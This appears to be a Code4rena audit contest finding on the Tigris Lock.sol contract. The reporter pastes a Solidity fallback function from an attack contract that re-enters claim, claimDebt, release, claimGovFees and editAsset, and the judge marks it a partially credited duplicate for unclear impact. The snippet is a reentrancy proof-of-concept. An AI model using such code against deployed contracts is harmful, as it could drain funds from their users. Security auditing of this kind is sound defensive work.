Platform: Code4rena
Start Date: 09/12/2022
Pot Size: $90,500 USDC
Total HM: 35
Participants: 84
Period: 7 days
Judge: GalloDaSballo
Total Solo HM: 12
Id: 192
League: ETH
Rank: 58/84
Findings: 1
Award: $100.62
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: unforgiven
Also found by: 0xsomeone, KingNFT, debo, hihen, mookimgo, rotcivegaf, stealthyz, wait
100.6152 USDC - $100.62
Rentrancy using fallback to call functions called claim, calimDebt, release, claimGovFee, and editAsset from attack file.
sourcecode: https://github.com/code-423n4/2022-12-tigris/blob/main/contracts/Lock.sol attack sourcecode: https://github.com/gbadebosmith/ouch/blob/main/AttackLock.sol
fallback() external payable { if (address(locki).balance >= 1 ether) { locki.claim(1234567890); locki.claimDebt(0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6); //locki.lock(_asset, _amount, _period); //locki.extendLock(_id, _amount, _period); locki.release(1234567890); locki.claimGovFees(); locki.editAsset(0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6, true); //locki.sendNFTs(0x0011111111111111111111111111); } }
Remix IDE
#0 - GalloDaSballo
2022-12-19T00:35:35Z
Same as the other submission, missing impact, unclear if there's any economic value to be extracted from the reEntrancy
#1 - GalloDaSballo
2022-12-22T02:45:31Z
Not happy with submission quality, will award 50%
I think you got the chops to code, you have to improve your report quality though
#2 - c4-judge
2022-12-22T02:45:53Z
GalloDaSballo marked the issue as duplicate of #400
#3 - c4-judge
2022-12-22T02:45:58Z
GalloDaSballo marked the issue as partial-50